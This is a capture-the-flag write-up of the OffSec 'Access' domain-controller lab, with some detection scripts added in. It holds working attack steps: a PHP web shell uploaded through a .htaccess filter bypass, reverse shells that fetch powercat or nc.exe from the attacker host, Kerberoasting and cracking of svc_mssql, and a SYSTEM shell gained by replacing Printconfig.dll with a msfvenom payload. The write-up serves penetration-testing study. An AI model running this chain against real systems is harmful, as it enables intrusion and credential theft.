Access

Connect to the VPN before starting the Access machine on OffSec (openvpn Downloads/universal\(1\).ovpn).

What you will learn in this writeup

Information gathering and enumeration using nmap and gobuster
Exploiting a file upload vulnerability using .htaccess
Kerberos attacks on service accounts
Active Directory Windows privilege escalation using SeManageVolumePrivilege

Enumeration

1. nmap 192.168.167.187 -sVC -A -p- --min-rate 10000

2. rustscan --addresses 192.168.167.187 --ulimit 5000 -- -A -sC -Pn -sV -T 1500

The presence of ports 53 (DNS), 88 (Kerberos Authentication), and 389 (LDAP) immediately suggests that this is a Domain Controller.

There's an Apache web server running on port 80.

The usual SMB ports, 139 and 445, paired with port 5985, suggest potential Remote Management access.

Ports 636 (Secure LDAP) and 2369 are listed as "tcpwrapped", which is unclear; further information might be gained via a netcat banner grab or by re-running Nmap with the -T0 flag to slow the scan down.

Additionally, there's an unknown .NET message framework on port 9389 and a range of Microsoft RPC ports.

dig any access.offsec @IP

dig axfr access.offsec @IP

dirbuster

dirb http://192.168.190.187/

Dirsearch

dirsearch -u http://192.168.167.187/ -w /wordlist/directory-list-lowercase-2.3-small.txt -e php,txt,html,htm,asp,aspx -o results.txt

dirsearch -u http://192.168.167.187/ -w /wordlist/raft-small-files-lowercase.txt -o results.txt

curl

curl 'http://192.168.167.18/uploads/siren.evil?cmd=whoami'

Port 88 - Kerberos

Port 88 is likely the Domain Controller, so we can query the DC for potential domain users that we can password spray later on.

kerbrute userenum -d access.offsec --dc 192.168.150.187 /usr/share/wordlists/seclists/Usernames/top-usernames-shortlist.txt

Port 139 - LDAP

We will identify the domain name and other general information about the domain by querying LDAP with ldapsearch.

ldapsearch -H ldap://192.168.150.187 -x -s base -b '' "(objectClass=*)" "*"

And we find some useful information: the domains access.offsec and SERVER.access.offsec should be added to /etc/hosts.

SMB Enumeration

Since SMB is open, we can try listing shares with a null and guest session.

nxc smb access.offsec -u '' -p '' --shares

nxc smb access.offsec -u 'a' -p 'a' --shares

Initial Access

The entry points are likely via password spraying the domain controller or via the web application.

Web Portal Enumeration & Fuzzing

An Apache server (port 80) is running on this domain controller.

Meanwhile, we will perform a directory enumeration on the port in the background.

gobuster dir -u http://192.168.167.187/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -b "400,403,404" -t 50 -e -x "html,php,txt,jsp"

I chose 42 threads with -t 42 and, with -b 400,403,404, ignored response codes that will not be useful to me now.

Then add the domain name to our /etc/hosts file.

subl /etc/hosts

We could try a DNS zone transfer, an ldapsearch (since we have the domain name), or SMB enumeration with enum4linux and smbclient, but we are going to go to the Apache web server first.

Wappalyzer is a Firefox plugin useful for web application enumeration.

Let's try a PHP Ivan Sincek shell from https://www.revshells.com/ and https://github.com/flozz/p0wny-shell

Create a simple PHP file:

<pre>
<?php
system($_GET['cmd']);
?>
</pre>

updog just hosts a web server that serves files from my current working directory; see: https://github.com/sc0tfree/updog

Enter the appropriate tun0 IP address; I'll use port 135 since it is an SMB-enabled Windows box. Copy the code into a text file, save it (shell.php), and browse to it.

There is a web application running on the Apache server that sells tickets.

If you scroll down the homepage, youโ€™ll notice that the site allows users to upload an image file during the ticket purchasing process.

There are a few potentially vulnerable form fields worth checking, but they don't lead anywhere until you click on one of the three "Buy Now" buttons near the bottom. Since my goal is to go for the 'Pro' option, I'll select that one.

The "/uploads" directory appears to be of interest and seems to be where users' image uploads are stored. Let's confirm this assumption.

We are redirected and discover that they are wise to our ways. PHP is not allowed.

Initial Access / File Upload Vulnerability

The server wouldn't accept any files with the ".php" extension, likely because it's on the server's blocklist.

Interestingly, we discovered that while known script extensions like ".php" and ".php4" were blocked, we were able to upload files with a custom extension, such as ".tty".

We uploaded the web shell as "shell.tty", and the server accepted it.

Unfortunately, the server didn't execute the web shell due to the unrecognized extension. Instead, it simply displayed the source code of the file.

Noticing that the server is running Apache, we realized we could upload an ".htaccess" file to instruct the server to treat the ".tty" extension as a PHP script.

Content of the .htaccess file

echo "AddType application/x-httpd-php .tty" > .htaccess

We are then shuffled back to the home page where we are free to try another file type. By exhaustion, we learn that none of the PHP-type extensions will be accepted.

We create our own .htaccess file that outlines a NEW PHP file type and upload it.

https://thibaud-robin.fr/articles/bypass-filter-upload/ - Reference

echo "AddType application/x-httpd-php .dork" > .htaccess

Ref - https://portswigger.net/web-security/file-upload/lab-file-upload-web-shell-upload-via-extension-blacklist-bypass

Be aware that to be able to select this file for upload, you will have to change your view setting with a right-click after browsing to its location. Make sure the "Show Hidden Files" box is checked.

We receive a different popup message.

Change the name of your shell.php file to end in the new PHP extension type.

Now we will be able to upload it. However, we set up our listener first, in parallel.

rlwrap nc -lnvp 135

I use rlwrap so that I retain use of my arrow key functionality upon connection.

Now we upload the shell.dork PHP file.

It is not denied and we receive the same positive popup as with the .htaccess file. Nothing worked at that point, so we will try gobuster.

gobuster dir -u http://192.168.167.187/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -b "400,403,404" -t 50 -e -x "html,php,txt,jsp"

http://192.168.167.187/index.html
http://192.168.167.187/uploads
http://192.168.167.187/assets
http://192.168.167.187/forms
http://192.168.167.187/Index.html
http://192.168.167.187/examples
http://192.168.167.187/Forms
http://192.168.167.187/Assets
http://192.168.167.187/INDEX.html
http://192.168.167.187/ticket.php
http://192.168.167.187/Uploads
http://192.168.167.187/FORMS
http://192.168.167.187/Ticket.php

Option 2:

wfuzz -c -z file,/usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt --hc 404 http://192.168.167.187:80/FUZZ

Click on our uploaded shell and notice that the browser hangs and will not resolve. This is promising. Check the listener.

Check the privileges by entering whoami /priv

First we will get the local flag.

C:\xampp>type passwords.txt

XAMPP Default Passwords

  1. MySQL (phpMyAdmin):

    User: root Password: (means no password!)

  2. FileZilla FTP:

    [ You have to create a new user on the FileZilla Interface ]

  3. Mercury (not in the USB & lite version):

    Postmaster: Postmaster (postmaster@localhost) Administrator: Admin (admin@localhost)

    User: newuser Password: wampp

  4. WEBDAV:

    User: xampp-dav-unsecure Password: ppmax2011 Attention: WEBDAV is not active since XAMPP Version 1.7.4. For activation please comment out the httpd-dav.conf and following modules in the httpd.conf

    LoadModule dav_module modules/mod_dav.so LoadModule dav_fs_module modules/mod_dav_fs.so

    Please do not forget to refresh the WEBDAV authentication (users and passwords).

Another Option:

Arbitrary File Upload -> Foothold

I then decided to check whether I could upload a PHP web shell, and hopefully, I could run commands on the machine remotely. By the way, there are a lot of PHP web shells out there, and the one I used here is from

However, the server doesn't seem to allow any file with the ".php" extension. The ".php" extension might be in the blocklist of the server.

I was able to upload files with my own extension such as ".xxx". Then I uploaded the web shell as "webshell.xxx" to the server and the server accepted it.

I tried to run the file in upload directory. It turned out the server didn't render the shell at all due to the unknown extension, it printed out the source code.

It can be noticed that the server running on the machine is Apache. So we could potentially upload a ".htaccess" file to the directory to let the server render my ".xxx" extension as a PHP script. Reference video: https://www.youtube.com/watch?v=xZd1JWmLGLk

I made a ".htaccess" file and sent it to the server.

echo "AddType application/x-httpd-php .xxx" > .htaccess

The ".htaccess" file wasn't shown in the "/uploads" directory because it is a hidden file. But after uploading it, I could see the web shell we uploaded just now had been rendered. The server now renders the ".xxx" extension as PHP. And it allowed me to perform command execution.

Now to get a foothold on the machine. On the Kali machine, run a web server on port 80 to serve powercat.ps1.

1. Locate the powercat.ps1 file on Kali; if it is not present, download it from https://github.com/besimorhino/powercat

Execute the command through the web shell to download powercat.ps1 with PowerShell and run the reverse shell command.

In parallel, run netcat to catch the reverse shell:

rlwrap nc -nvlp 4444

Powershell IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.45.202/powercat.ps1');powercat -c 192.168.45.202 -p 4444 -e cmd

Once we click execute we will get the reverse shell.

Lateral Movement (svc_apache -> svc_mssql)

The local.txt isn't in the "svc_apache" folder, and "svc_mssql" was not accessible to the current user. So I need to move laterally to "svc_mssql" to get the flag.

Based on the naming convention, I assumed "svc_mssql" is a service account for which service tickets can be requested. But first, I need a list of the service principal names on the machine, which I will obtain with a PowerShell script.

https://github.com/compwiz32/PowerShell/blob/master/Get-SPN.ps1

Download the above file in kali

Use the raw URL; the GitHub blob page returns HTML rather than the script:

wget https://raw.githubusercontent.com/compwiz32/PowerShell/master/Get-SPN.ps1

There are two ways to download the file to the victim machine.

Option 1:

First set up your python web server on Kali.

Powershell (New-Object System.Net.WebClient).DownloadFile('http://192.168.45.202/Get-SPN.ps1','C:\Users\svc_apache\Desktop\Get-SPN.ps1')

Option 2:

First set up your python web server on Kali.

certutil -urlcache -split -f http://192.168.45.202/Get-SPN.ps1

Since it is a PowerShell script, let's change shells on the victim machine and run the script.

powershell -ExecutionPolicy Bypass

.\Get-SPN.ps1

The SPN of the "MSSQL" object was now obtained: "MSSQLSvc/DC.access.offsec". The next step was to request the ticket from "svc_mssql" and get the hash from the ticket.

<pre>
Object Name = krbtgt
DN = CN=krbtgt,CN=Users,DC=access,DC=offsec
Object Cat. = CN=Person,CN=Schema,CN=Configuration,DC=access,DC=offsec
servicePrincipalNames
SPN( 1 ) = kadmin/changepw

Object Name = MSSQL
DN = CN=MSSQL,CN=Users,DC=access,DC=offsec
Object Cat. = CN=Person,CN=Schema,CN=Configuration,DC=access,DC=offsec
servicePrincipalNames
SPN( 1 ) = MSSQLSvc/DC.access.offsec
</pre>

To request the ticket, two commands are executed: one loads the assembly and the other requests the ticket and stores it in memory.

The MSSQL service account will likely have better privileges. Now that we have the SPN, we are able to request a ticket and store it in memory with the end goal of getting its hash.

PS> Add-Type -AssemblyName System.IdentityModel

PS> New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList 'MSSQLSvc/DC.access.offsec'

To get the Kerberoast hash of the ticket, "Invoke-Kerberoast.ps1" is needed to extract the hash from memory: https://github.com/EmpireProject/Empire/blob/master/data/module_source/credentials/Invoke-Kerberoast.ps1

First set up your python web server on Kali.

python3 -m http.server 80

Run the script through the command below (this gave an error in my case, so I will try another option):

iex(new-object net.webclient).downloadString('http://192.168.45.202:80/Invoke-Kerberoast.ps1'); Invoke-Kerberoast -OutputFormat Hashcat

I saved the extracted hash locally on Kali in a file named "hashaccess" and was ready to crack it.

Now crack it with either John the Ripper or Hashcat. The file names below (hashaccess, svc_mssql.kerberoast, svc_mssql.hash) are simply whatever the hash was saved as.

john --wordlist=/usr/share/wordlists/rockyou.txt --rules=best64 hashaccess

john --format=krb5tgs hashaccess --wordlist=/usr/share/wordlists/rockyou.txt

Crack the "krb5tgs" hash with hashcat:

hashcat -m 13100 --force -a 0 svc_mssql.kerberoast /usr/share/wordlists/rockyou.txt

hashcat -m 13100 --force -a 0 svc_mssql.hash /usr/share/wordlists/rockyou.txt

Alternative: using nc.exe

1. Create a .htaccess file to bypass the upload filter using our own extension (.nkr): AddType application/x-httpd-php .nkr

echo "AddType application/x-httpd-php .nkr" > .htaccess

2. Create a sample PHP file krampt.nkr:

<pre>
<?php
system($_GET['cmd']);
?>
</pre>

3. Upload both files and browse to the uploaded file.

Option 2:

curl http://192.168.195.187/uploads/krampt.nkr?cmd=dir

Transfer nc.exe to the victim machine. First confirm it is served from Kali:

curl http://192.168.45.202/nc.exe

Then fetch nc.exe onto the victim machine by running the command through the web shell:

http://192.168.195.187/uploads/krampt.nkr?cmd=curl http://192.168.45.202/nc.exe -o .\nc.exe

Get a reverse shell:

http://192.168.158.187/uploads/krampt.nkr?cmd=.\nc.exe%20192.168.45.199%209090%20-e%20cmd.exe

Let us transfer powerview.ps1.

1. Enable the Python web server: python3 -m http.server 80

2. Locate and copy the powerview.ps1 file.

3. Now transfer the powerview.ps1 file to the victim machine (the Access machine).

dir /a /o /q

Using PowerView to get more information.

C:\xampp\htdocs\uploads>powershell

PS C:\xampp\htdocs\uploads> import-module .\powerview.ps1

PS C:\xampp\htdocs\uploads> Get-NetUser svc_mssql

Kerberoasting works on TGS (service) tickets: the TGS is the KDC component that issues service tickets. We can use Rubeus.exe to request them.

We need a TGS ticket.

Locate Rubeus.exe and copy it to the victim server:

PS C:\xampp\htdocs\uploads> curl http://192.168.45.199/Rubeus.exe -o .\Rubeus.exe

To generate the Kerberoast hashes:

PS C:\xampp\htdocs\uploads> .\Rubeus.exe kerberoast /nowrap

Copy and save the hashes in a file

Crack the hash using john

john --wordlist=/usr/share/wordlists/rockyou.txt hashes
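Both ticket-request paths above (the KerberosRequestorSecurityToken call followed by Invoke-Kerberoast, and Rubeus kerberoast) leave the same trace on the domain controller: Security Event ID 4769 entries for service accounts, typically with RC4 (etype 0x17) encryption. The following Python example is added here, is not part of the writeup, and runs two simple detections over constructed 4769 records; the field names follow the event schema, the account names and thresholds are my own.

```python
from collections import defaultdict

# Ticket encryption types as logged in Security Event ID 4769 (service ticket requested).
RC4_HMAC = "0x17"   # etype 23: what the Kerberoast requests above ask for when the account allows it
AES256 = "0x12"     # etype 18: expected for accounts restricted to AES

# Constructed sample events. Field names follow the 4769 schema; the values are
# made up for this example and do not come from the lab machine.
SAMPLE_4769 = [
    {"TargetUserName": "svc_apache@ACCESS.OFFSEC", "ServiceName": "krbtgt", "TicketEncryptionType": AES256, "Status": "0x0"},
    {"TargetUserName": "svc_apache@ACCESS.OFFSEC", "ServiceName": "DC$", "TicketEncryptionType": AES256, "Status": "0x0"},
    {"TargetUserName": "svc_apache@ACCESS.OFFSEC", "ServiceName": "MSSQL", "TicketEncryptionType": RC4_HMAC, "Status": "0x0"},
    {"TargetUserName": "alice@ACCESS.OFFSEC", "ServiceName": "MSSQL", "TicketEncryptionType": AES256, "Status": "0x0"},
    {"TargetUserName": "bob@ACCESS.OFFSEC", "ServiceName": "svc_backup", "TicketEncryptionType": RC4_HMAC, "Status": "0x0"},
    {"TargetUserName": "bob@ACCESS.OFFSEC", "ServiceName": "svc_web", "TicketEncryptionType": RC4_HMAC, "Status": "0x0"},
    {"TargetUserName": "bob@ACCESS.OFFSEC", "ServiceName": "svc_sql", "TicketEncryptionType": RC4_HMAC, "Status": "0x0"},
    {"TargetUserName": "bob@ACCESS.OFFSEC", "ServiceName": "svc_old", "TicketEncryptionType": RC4_HMAC, "Status": "0x1f"},
]


def is_user_service_account(service_name: str) -> bool:
    """Computer accounts ($) and krbtgt are not roasting targets; user accounts with SPNs are."""
    return not service_name.endswith("$") and service_name.lower() != "krbtgt"


def find_kerberoast_indicators(events, sweep_threshold: int = 3) -> list:
    """Two detections over 4769 events:
    - rc4_service_ticket: an RC4 ticket issued for a user service account (downgrade pattern)
    - spn_sweep: one requester asking for tickets to many distinct service accounts
    Failed requests (Status != 0x0) are ignored because no ticket, and so no hash, was issued."""
    findings = []
    services_per_requester = defaultdict(set)
    for ev in events:
        if ev["Status"] != "0x0" or not is_user_service_account(ev["ServiceName"]):
            continue
        services_per_requester[ev["TargetUserName"]].add(ev["ServiceName"])
        if ev["TicketEncryptionType"] == RC4_HMAC:
            findings.append(("rc4_service_ticket", ev["TargetUserName"], ev["ServiceName"]))
    for requester, services in services_per_requester.items():
        if len(services) >= sweep_threshold:
            findings.append(("spn_sweep", requester, len(services)))
    return findings


if __name__ == "__main__":
    for finding in find_kerberoast_indicators(SAMPLE_4769):
        print(finding)
```

The mitigation follows from the same fields: a service account limited to AES (msDS-SupportedEncryptionTypes) never yields an RC4 ticket, and a long random password or a group managed service account makes the john and hashcat steps above impractical even when a ticket is obtained.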

Download Invoke-RunasCs.ps1 and copy it to the victim machine:

curl http://192.168.45.199/Invoke-RunasCs.ps1 -o .\Invoke-RunasCs.ps1

PS C:\xampp\htdocs\uploads> Import-Module .\Invoke-RunasCs.ps1

Invoke-RunasCs.ps1 only defines the Invoke-RunasCs function; running the script file with positional arguments does nothing, so call the function after importing it:

Invoke-RunasCs -Username svc_mssql -Password trustno1 -Command 'c:/xampp/htdocs/uploads/nc.exe 192.168.45.199 5555 -e cmd.exe'

powershell -ep bypass -c ". .\Invoke-RunasCs.ps1; Invoke-RunasCs -Username svc_mssql -Password trustno1 -Command 'c:/xampp/htdocs/uploads/nc.exe 192.168.45.199 4444 -e cmd.exe'"

We will try another option, RunasCs.exe:


curl http://192.168.45.199/RunasCs.exe -o RunasCs.exe

Run this command on the victim machine to get a shell as svc_mssql:

PS C:\users\public\temp> .\RunasCs.exe svc_mssql trustno1 cmd.exe -r 192.168.45.199:8081

Privilege escalation - to Get the root flag

Check the privileges using command whoami /priv

Check netstat -ano; nothing useful was identified.

We can try the SeManageVolumePrivilege exploit.

SeManageVolumeExploit.exe is not shipped with Kali Linux, so download it from the link below.

SeManageVolumePrivilege Privilege Escalation

The SeManageVolumePrivilege privilege in Windows allows a user to perform volume-related operations, such as defragmenting, mounting, or dismounting a volume. This privilege is normally restricted to highly privileged accounts, like Administrators.

Privilege Escalation via SeManageVolumePrivilege occurs when an attacker with this privilege gains access to the system and can exploit it to escalate their privileges further. Specifically, the attacker might use this privilege to:

Mount/Dismount Volumes: Attackers can mount volumes containing sensitive data, potentially bypassing access control mechanisms.

Corrupt or Manipulate File Systems: By interacting with file systems at the volume level, attackers could introduce malicious changes or corrupt files to create backdoors or disrupt system functionality.

Potential Code Execution: Depending on the volume operations allowed, attackers may trigger scenarios that lead to arbitrary code execution.
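Before reaching for the exploit, it helps to read the whoami /priv output systematically. The Python example below is added here and is not from the writeup: it parses a constructed whoami /priv listing and flags privileges that are commonly escalation paths. The sample text and the risk notes are mine; the privilege names are the standard Windows ones.

```python
# Constructed whoami /priv output in the shape the command prints on Windows;
# the specific rows are made up for this example.
SAMPLE_WHOAMI_PRIV = """
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                          State
============================= ==================================== ========
SeMachineAccountPrivilege     Add workstations to domain           Disabled
SeChangeNotifyPrivilege       Bypass traverse checking             Enabled
SeManageVolumePrivilege       Perform volume maintenance tasks     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set       Disabled
"""

# Privileges a defender should treat as equivalent to local admin when held by a
# low-privilege or service account. The notes are my own one-line summaries.
HIGH_RISK_PRIVILEGES = {
    "SeManageVolumePrivilege": "raw volume handle; can be turned into writes under C:\\Windows (the exploit used here)",
    "SeImpersonatePrivilege": "impersonate client tokens, including those of SYSTEM services",
    "SeAssignPrimaryTokenPrivilege": "assign a primary token to a new process",
    "SeBackupPrivilege": "read any file regardless of its ACL",
    "SeRestorePrivilege": "write any file regardless of its ACL",
    "SeTakeOwnershipPrivilege": "take ownership of any securable object",
    "SeDebugPrivilege": "open any process, including SYSTEM ones",
    "SeLoadDriverPrivilege": "load kernel-mode drivers",
}


def parse_whoami_priv(text: str) -> dict:
    """Map privilege name -> state, reading only the rows after the ==== separator line."""
    privileges = {}
    in_table = False
    for line in text.splitlines():
        if line.startswith("===="):
            in_table = True
            continue
        if not in_table or not line.strip():
            continue
        columns = line.split()
        privileges[columns[0]] = columns[-1]   # name is the first column, State the last
    return privileges


def risky_privileges(text: str) -> list:
    """Return (name, state, why) for every high-risk privilege present in the token.
    A 'Disabled' state is still reported: the token holds the privilege and a process
    can enable it itself, which is exactly the exploit's first step."""
    found = parse_whoami_priv(text)
    return sorted(
        (name, state, HIGH_RISK_PRIVILEGES[name])
        for name, state in found.items()
        if name in HIGH_RISK_PRIVILEGES
    )


if __name__ == "__main__":
    for name, state, why in risky_privileges(SAMPLE_WHOAMI_PRIV):
        print(f"{name} ({state}): {why}")
```

On the hardening side, the finding translates directly into a Group Policy review: the "Perform volume maintenance tasks" user right should be assigned only to Administrators, and a service account such as svc_mssql should not hold it.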

https://github.com/CsEnox/SeManageVolumeExploit/releases/tag/public

Copy the file from the Kali Linux machine to the victim machine:

1. Start the Python web server: python3 -m http.server 80

2. Copy the file to the victim machine using the command below:

certutil -urlcache -split -f "http://192.168.45.199/SeManageVolumeExploit.exe"

or

curl http://192.168.45.199/SeManageVolumeExploit.exe -o SeManageVolumeExploit.exe

Run the tasklist to view the running tasks

Run the net start to view the started services

Run the command to view the systeminfo

C:\Users\Public>systeminfo

The system appears to be patched; however, we will still try to run the exploit:

.\SeManageVolumeExploit.exe

The tool reports "921 entries changed".

wpcoreutil.dll (Windows Insider service) could be overwritten to get a shell.

Printconfig.dll is the one we will use.

We can create the payload DLL using msfvenom:

msfvenom -a x64 -p windows/x64/shell_reverse_tcp LHOST=192.168.45.163 LPORT=1337 -f dll -o printconfig.dll

Copy the file to victim machine using below command

certutil -urlcache -split -f "http://192.168.45.163/printconfig.dll"

or

curl http://192.168.45.163/printconfig.dll -o printconfig.dll

We have to copy the DLL over the existing one at C:\Windows\System32\spool\drivers\x64\3\

C:\Users\Public>copy Printconfig.dll C:\Windows\System32\spool\drivers\x64\3\

POC - https://github.com/CsEnox/SeManageVolumeExploit

SeManageVolumeExploit

This exploit grants full permission on C:\ drive for all users on the machine.

Enables the privilege in the token
Creates handle to \.\C: with SYNCHRONIZE | FILE_TRAVERSE
Sends the FSCTL_SD_GLOBAL_CHANGE to replace S-1-5-32-544 with S-1-5-32-545

Overwriting "Printconfig.dll" for SYSTEM Shell Access

The capacity to create a file under user control within protected directories opens up a multitude of possibilities for privilege escalation. One of the relatively straightforward techniques involves replacing the "Printconfig.dll" file situated at "C:\Windows\System32\spool\drivers\x64\3" with a malicious DLL. By initiating the PrintNotify object, the service will load our nefarious PrintConfig.dll, thereby granting us a privileged SYSTEM shell.
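The write primitive described above only becomes a SYSTEM shell because a DLL in the spool driver directory is replaced without anyone noticing. The Python example below is added here and is not part of the writeup or of the exploit's repository; it shows the defender's counterpart, a file-integrity baseline that reports modified, added and removed files. It works on a temporary directory with constructed stand-in files, and the real path C:\Windows\System32\spool\drivers\x64\3 is only named in a comment.

```python
import hashlib
import os
import tempfile


def sha256_file(path: str) -> str:
    """Stream a file through SHA-256 so large driver DLLs need not fit in memory."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def baseline(directory: str) -> dict:
    """Map filename -> SHA-256 for every regular file directly inside directory."""
    result = {}
    for name in sorted(os.listdir(directory)):
        path = os.path.join(directory, name)
        if os.path.isfile(path):
            result[name] = sha256_file(path)
    return result


def diff_against_baseline(directory: str, known: dict) -> dict:
    """Compare the directory's current contents with a stored baseline."""
    current = baseline(directory)
    return {
        "modified": sorted(n for n in known if n in current and current[n] != known[n]),
        "added": sorted(n for n in current if n not in known),
        "removed": sorted(n for n in known if n not in current),
    }


def simulate_printconfig_overwrite() -> dict:
    """Constructed scenario: a stand-in for C:\\Windows\\System32\\spool\\drivers\\x64\\3
    is baselined, then Printconfig.dll is replaced and a dropped tool appears."""
    with tempfile.TemporaryDirectory() as spool_dir:
        originals = {
            "Printconfig.dll": b"MZ original print configuration module",
            "UNIDRV.DLL": b"MZ universal printer driver",
        }
        for name, body in originals.items():
            with open(os.path.join(spool_dir, name), "wb") as fh:
                fh.write(body)
        known = baseline(spool_dir)

        # The replacement the writeup performs with msfvenom output (simulated bytes only).
        with open(os.path.join(spool_dir, "Printconfig.dll"), "wb") as fh:
            fh.write(b"MZ something that is not the vendor module")
        with open(os.path.join(spool_dir, "nc.exe"), "wb") as fh:
            fh.write(b"MZ dropped tool")

        return diff_against_baseline(spool_dir, known)


if __name__ == "__main__":
    print(simulate_printconfig_overwrite())
```

In production this role is played by a file-integrity monitor or a Sysmon FileCreate (Event ID 11) rule scoped to the spool driver directory; the point is that the overwrite is loud on disk even though the later CLSID activation looks like ordinary print-service activity.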

Proof of Concept:

Generate a custom DLL and locate it at C:\Windows\System32\spool\drivers\x64\3\Printconfig.dll.
Initiate the PrintNotify object by executing the following PowerShell commands:

$type = [Type]::GetTypeFromCLSID("{854A20FB-2D44-457D-992F-EF13785D2B51}")
$object = [Activator]::CreateInstance($type)

Attain a system shell access.

Start PowerShell and run the commands below; in parallel, start the listener:

nc -nvlp 1337

PS C:\Users\Public> $type = [Type]::GetTypeFromCLSID("{854A20FB-2D44-457D-992F-EF13785D2B51}")

PS C:\Users\Public> $object = [Activator]::CreateInstance($type)

We get the reverse shell; confirm with:

whoami
